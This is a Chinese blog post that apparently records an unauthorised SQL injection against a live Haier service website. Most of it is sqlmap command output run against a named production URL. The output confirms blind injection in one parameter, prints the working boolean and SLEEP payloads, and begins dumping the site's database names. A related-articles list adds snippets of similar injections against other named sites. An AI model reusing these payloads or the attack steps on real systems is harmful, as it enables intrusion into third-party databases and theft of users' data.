info testing mysql_海尔官方商城某处SQL注入可泄露全网数据

最新推荐文章于 2023-04-27 22:26:01 发布
最新推荐文章于 2023-04-27 22:26:01 发布
阅读量286 收藏
点赞数
文章标签: info testing mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28684825/article/details/114507441
版权

[[email protected]~]# Sqlmap Sqlmap -u "http://fw.rrs.com/snaplb/FAQ/FAQList?tLevel=33480a48-0f72-489a-b209-16a7e0331634&pageNum=1&pageSize=5" --dbssqlmap/1.0-dev - automatic SQL injection and database takeover tool

http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all ap[*] starting at 15:10:01[15:10:02] [INFO] testing connection to the target URL

[15:10:02] [INFO] heuristics detected web page charset 'ISO-8859-2'

[15:10:03] [INFO] testing if the target URL is stable. This can take a couple of seconds

[15:10:04] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are

how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] y

[15:10:06] [INFO] testing if GET parameter 'tLevel' is dynamic

[15:10:07] [INFO] confirming that GET parameter 'tLevel' is dynamic

[15:10:07] [INFO] GET parameter 'tLevel' is dynamic

[15:10:08] [WARNING] heuristic (basic) test shows that GET parameter 'tLevel' might not be injectable

[15:10:08] [INFO] testing for SQL injection on GET parameter 'tLevel'

[15:10:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[15:10:13] [INFO] GET parameter 'tLevel' is 'AND boolean-based blind - WHERE or HAVING clause' injectable

[15:10:19] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[15:10:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'

[15:10:20] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'

[15:10:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'

[15:10:21] [INFO] testing 'MySQL inline queries'

[15:10:21] [INFO] testing 'PostgreSQL inline queries'

[15:10:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'

[15:10:21] [INFO] testing 'Oracle inline queries'

[15:10:21] [INFO] testing 'SQLite inline queries'

[15:10:21] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[15:10:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries'

[15:10:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'

[15:10:22] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[15:11:22] [INFO] GET parameter 'tLevel' is 'MySQL > 5.0.11 AND time-based blind' injectable

[15:11:22] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'

[15:11:22] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found

[15:11:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'

GET parameter 'tLevel' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y

[15:12:04] [INFO] testing if GET parameter 'pageNum' is dynamic

[15:12:05] [INFO] confirming that GET parameter 'pageNum' is dynamic

[15:12:06] [INFO] GET parameter 'pageNum' is dynamic

[15:12:06] [WARNING] heuristic (basic) test shows that GET parameter 'pageNum' might not be injectable

[15:12:06] [INFO] testing for SQL injection on GET parameter 'pageNum'

[15:12:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[15:12:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[15:12:07] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'

[15:12:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'

[15:12:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'

[15:12:09] [INFO] testing 'MySQL inline queries'

[15:12:09] [INFO] testing 'PostgreSQL inline queries'

[15:12:09] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'

[15:12:09] [INFO] testing 'Oracle inline queries'

[15:12:09] [INFO] testing 'SQLite inline queries'

[15:12:09] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[15:12:10] [INFO] testing 'PostgreSQL > 8.1 stacked queries'

[15:12:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'

[15:12:11] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[15:12:11] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'

[15:12:12] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'

[15:12:12] [INFO] testing 'Oracle AND time-based blind'

[15:12:13] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[15:12:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[15:12:26] [WARNING] GET parameter 'pageNum' is not injectable

[15:12:26] [INFO] testing if GET parameter 'pageSize' is dynamic

[15:12:27] [INFO] confirming that GET parameter 'pageSize' is dynamic

[15:12:27] [INFO] GET parameter 'pageSize' is dynamic

[15:12:27] [WARNING] heuristic (basic) test shows that GET parameter 'pageSize' might not be injectable

[15:12:27] [INFO] testing for SQL injection on GET parameter 'pageSize'

[15:12:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[15:12:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[15:12:29] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'

[15:12:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'

[15:12:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'

[15:12:30] [INFO] testing 'MySQL inline queries'

[15:12:31] [INFO] testing 'PostgreSQL inline queries'

[15:12:31] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'

[15:12:31] [INFO] testing 'Oracle inline queries'

[15:12:31] [INFO] testing 'SQLite inline queries'

[15:12:31] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[15:12:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries'

[15:12:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'

[15:12:32] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[15:12:33] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'

[15:12:33] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'

[15:12:34] [INFO] testing 'Oracle AND time-based blind'

[15:12:34] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[15:12:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[15:12:47] [WARNING] GET parameter 'pageSize' is not injectable

sqlmap identified the following injection points with a total of 439 HTTP(s) requests:

---

Place: GET

Parameter: tLevel

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: tLevel=33480a48-0f72-489a-b209-16a7e0331634' AND 2704=2704 AND 'shJS'='shJS&pageNum=1&pageSize=5Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: tLevel=33480a48-0f72-489a-b209-16a7e0331634' AND SLEEP(5) AND 'LABx'='LABx&pageNum=1&pageSize=5

---

[15:12:47] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, JSP

back-end DBMS: MySQL 5.0.11

[15:12:47] [INFO] fetching database names

[15:12:47] [INFO] fetching number of databases

[15:12:47] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[15:12:47] [INFO] retrieved: 18

[15:12:54] [INFO] retrieved: information_schema

[15:14:17] [INFO] retrieved: aijia

[15:14:43] [INFO] retrieved: hibernate

[15:15:26] [INFO] retrieved: huxing

[15:15:57] [INFO] retrieved: iudp_basedata

[15:17:03] [INFO] retrieved: iudp_huxing

[15:17:59] [INFO] retrieved: iudp_rbac

[15:18:46] [INFO] retrieved: iudp_sh

算法艺术家
关注
info testing mysql_使用 sqlmap 进行 SQL 注入检测
weixin_29384935的博客
02-03 751
最近在看《白帽子讲 Web 安全》,讲服务器端注入攻击时提到一个神器 sqlmap。python sqlmap.py -u "https://my.oschina.net/lvyi/blog?catalog=423226&temp=1476090615355"即可开始分析有没有 SQL 注入的可能。[17:10:41] [INFO] GET parameter 'catalog' is d...
info testing mysql_诺亚舟教育网SQL注入漏洞(涉及近170w用户信息)
weixin_39943442的博客
02-03 570
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutualconsent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers ...
友价商城SQL注入
weixin_30764137的博客
04-08 224
友价商城SQL注入 源码出自:https://www.0766city.com/yuanma/9990.html 下载安装好后打开是这样的: 8不说了 ,seay审计一把梭哈 从开始审计 直到这处疑似有注入的地方: 文件地址:/config/return.php 点进去查看代码 可以看到一个$a...
yershop商城系统30处sql注入
weixin_33939843的博客
11-28 245
为什么80%的码农都做不了架构师?>>> ...
『PHP代码审计』SEMCMS外贸网站商城系统SCSHOP_v1.2存在SQL注入漏洞
Ho1aAs‘s Blog
07-02 979
文章目录前言一、漏洞演示二、漏洞分析三、利用完 前言 作者:Ho1aAs 博客:https://blog.csdn.net/xxy605 一、漏洞演示 进入后台-博客管理-任意选中、删除一项,抓包 POST /wgNecC_AQV/Ant_Inc.php?action=Clear&sort=info&lgid=1 HTTP/1.1 Host: testcms.com Content-Length: 12 Accept: */* X-Requested-With: XMLHttpRequ
MySQL SQL注入
冷月醉雪的博客
01-11 3431
防止SQL注入,我们需要注意以下几个要点: ·1.永远不要信任用户的输入。对用户的输入进行校验,可以通过正则表达式,或限制长度;对单引号和双"-"进行转换等。 ·2.永远不要使用动态拼装sql,可以使用参数化的sql或直接使用存储过程进行数据查询存取。 ·3.永远不要使用管理员权限的数据库连接,为每个应用使用单独的权限有限的数据库连接。 ·4.不要把机密信息直接存放,加密或hash掉密码和...
电商网站的sql注入 案例
xingzhiyang_peijun的博客
10-09 264
电商网站实现sql注入 http://www.cnblogs.com/carlyle-liu/p/3208380.html
Data_Wrangling_Analysis_and_AB_Testing_with_SQL_UCDavis_Coursera
04-08
SQL的强大之处在于其能处理大量数据,并进行精确的数据清洗。通过使用SQL的SELECT语句,我们可以提取需要的字段,同时使用WHERE子句过滤掉不符合条件的记录。此外,SQL提供了函数如NULLIF、COALESCE等,用于处理缺失...
如何检测mysql注入漏洞_SQL注入漏洞检测
weixin_32027887的博客
01-27 3864
一个度过菜鸟期的后台程序员都会小心的避开SQL注入常见低级错误。除了白盒和代码评审,作为第三方的渗透测试,使用sqlmap这样的常用工具进行SQL注入扫描可以降低上述问题发生概率。工具环境准备0.先检查一下是否安装过sqlmap工具,显示下版本sqlmap --version如果运行成功说明已经安装此工具,比如返回1.1.6#pip如果没有安装过sqlmap,请参考后面两个步骤1.安装pip工具多...
SQL注入文献.zip
03-18
解银朋.caj):该论文可能探讨了一种利用半监督学习的方法,通过自我训练提升模型的检测能力,减少依赖大量标记数据的需求,从而更有效地识别SQL注入攻击。 2. **基于语义分析的SQL注入行为检测方案研究**(基于...
CTFHub SQl注入 时间盲注(sqlmap)
赤城封雪的博客
08-07 5227
CTFHub SQl注入 时间盲注(sqlmap) 0x00 简单介绍 这篇文章主要通过 CTFHub 时间盲注案例简单记录一下 sqlmap 的使用流程。 参考:sqlmap用户手册 | WooYun知识库 (xmd5.com) sqlmap 的功能: 1、判断可注入的参数 2、判断可以用那种SQL注入技术来注入 3、识别出哪种数据库 4、根据用户选择,读取哪些数据 (具体过程可见文章末尾案例) sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2
web渗透测试实战-SQLMAP
c_lanxiaofang的博客
05-26 8361
一、实验项目名称 web渗透测试实战-SQLMAP 二、实验目的及要求 熟悉SQL注入漏洞原理 熟悉SQLMAP工具使用。 1、获取数据库信息:数据库漏洞、数据库名、数据库版本等 python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51"
sqlmap之POST注入与cookie注入
热门推荐
ve9etable的博客
10-28 2万+
零、POST注入 POST和GET POST和GET是HTTP的两种请求方法,并且是两种最常用的请求方法 GET一般指向指定资源请求数据,而POST则是要向指定资源提交需要被处理的数据 查询字符串是在 GET 请求的 URL 中发送的,类似于这样 而POST查询字符串是在 请求的 HTTP 消息主体中发送的,类似于这样 ...
《小迪安全》第15天 SQL注入:Oracle,MongoDB等注入
最新发布
m0_56250796的博客
04-27 694
Access是非关系型数据库,直接保存在网站源码下(后缀.mdb),A网站的数据库直接保存在A网站源码目录下,B网站数据库直接保存在B网站源码目录下,互不相干。NoSQLAttack 是一个用python编写的开源的攻击工具,用来暴露网络中默认配置mongoDB的IP并且下载目标mongoDB的数据,同时还可以针对以mongoDB为后台存储的应用进行注入攻击。Mongodb的查询文档方式与其他的数据库略微不同,当进行条件查询的时候,mysql是用where,而mongodb以键值对形式进行查询。
算机网络安全基础知识5:sql注入漏洞攻击,DVWA演示sql注入漏洞,如何利用sql注入查看数据库信息,sqlmap,sql注入漏洞的防御
weixin_46838716的博客
03-04 1766
算机网络安全基础知识5:sql注入漏洞攻击,DVWA演示sql注入漏洞,如何利用sql注入查看数据库信息,sqlmap,sql注入漏洞的防御
sqlmap工具使用手册
u012002125的博客
06-17 2563
sqlmap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞来接管数据库服务器。它具有强大的检测引擎,同时有众多强大功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。...
sqlmap代码
qq_46648283的博客
05-20 6647
Microsoft Windows [版本 10.0.19044.1706] (c) Microsoft Corporation。保留所有权利。 D:\sqlmap>sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_str.php?name=Tony&submit=%E6%9F%A5%E8%AF%A2 --current -db ___ __H__ ___ ___[)]_____ ___ ___ {1..
sqlmap 注入oracle,使用 sqlmap 进行 SQL 注入检测
weixin_34915171的博客
04-13 1667
为什么80%的码农都做不了架构师?>>> 最近在看《白帽子讲 Web 安全》,讲服务器端注入攻击时提到一个神器 sqlmap。到 Github:sqlmap 下载工具,到目录下运行python sqlmap.py -u "https://my.oschina.net/lvyi/blog?catalog=423226&temp=1476090615355"即可开始分析有没有...
mysql文件上传漏洞_智行车SQL注入漏洞+后台任意文件上传(已Getshell)
weixin_36251174的博客
02-02 747
---Parameter: #1* (URI)Type: boolean-based blindTitle: AND boolean-based blind - WHERE or HAVING clausePayload: http://zhixingche.me:80/site/search-post?type=0&keyword=" AND 3677=3677 AND "VuZD" L...
"研究计算机mysql模型驱动的web应用SQL注入安全漏洞渗透测试
In the document titled "Research on Penetration Testing of SQL Injection Security Vulnerabilities in Model-Driven Web Applications Using MySQL," the authors highlight the increasing significance of ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值